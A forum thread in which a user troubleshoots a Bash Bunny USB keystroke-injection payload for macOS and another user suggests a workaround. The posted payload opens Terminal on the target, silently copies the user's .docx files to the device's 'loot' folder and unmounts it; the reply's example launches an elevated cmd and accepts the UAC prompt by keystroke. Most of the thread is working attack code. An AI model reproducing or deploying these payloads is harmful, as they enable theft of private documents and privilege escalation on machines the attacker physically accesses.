aaaaaaaa Posted March 10, 2017

Hello, I am working on a script to copy document files from an OSX user's Documents directory, and there seems to be an issue with text encoding of my copy command. The script is supposed to open a terminal, copy 20 seconds' worth of docx files from the user's ./Documents directory to the /Volumes/BashBunny/loot directory, then close the terminal, unmount the drive, then make the LED green. I created the loot dir on the root of the bunny ahead of time.

The line that is having trouble is here:

QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;

Here is the terminal output from when the bunny runs this line:

find ./Documents -iname *.docx -exec cp {} /Volumes/BashBunny/loot ;
find: -exec: no terminating ";" or "+"

The bunny seems to be stripping quotes and backslashes. I have tried to use similar bash commands with other special characters, but I also seem to have the same issue with pipes. I rewrote everything just having the bunny call a bash script. I had no issues using that approach, but I want to get it working in DuckyScript and not rely on additional scripts.

I also noticed that when trying to access directories using ~/, the bunny changed my text to /root, although the username on the target system that was executing the payload was not root. The DuckyScript and Bash Bunny wikis do not seem to mention any of this substitution, unless I am completely missing it...

Thanks!

# Bash Bunny payload as posted (one command per line)
LED R
ATTACKMODE HID STORAGE
source bunny_helpers.sh
LED B
QUACK DELAY 1000
# Open Spotlight and launch Terminal
QUACK COMMAND SPACE
QUACK DELAY 800
QUACK STRING Terminal
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
# The problematic line: quotes and the backslash are consumed by the bunny's shell
QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;
QUACK ENTER
QUACK DELAY 10000
QUACK DELAY 10000
# Close Terminal
QUACK COMMAND q
QUACK DELAY 500
QUACK ENTER
# Reopen Terminal to unmount the bunny's storage
QUACK COMMAND SPACE
QUACK DELAY 800
QUACK STRING Terminal
QUACK DELAY 800
QUACK ENTER
QUACK STRING diskutil unmount /Volumes/BashBunny
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK COMMAND q
QUACK DELAY 500
QUACK ENTER
LED G
Tasty Posted March 10, 2017

Hey! It's important to remember that the payloads appear to be running in the context of a bash terminal on the Bash Bunny (hence the name).

So! Something I have run into is the bash terminal interpreting QUACK or Q statements, such as / or cd ~/ or even quotations.

A really easy way to get around this is to place all the DuckyScript into a txt file such as part1.txt and use QUACK switch2/part1.txt

Example payload.txt:

#!/bin/bash
LED R 500
ATTACKMODE HID STORAGE
QUACK switch2/kickOff.txt
LED G

Example kickOff.txt:

GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 100
STRING HelloWorld!
ENTER

Let me know if I can help any more!
aaaaaaaa (Author) Posted March 10, 2017

Ahhh, ok. Thank you for the clarification. That makes sense. I was trying to do it all in one file. Thank you for the help!
audibleblink Posted March 10, 2017

It appears we had the same idea. https://github.com/hak5/bashbunny-payloads/pull/36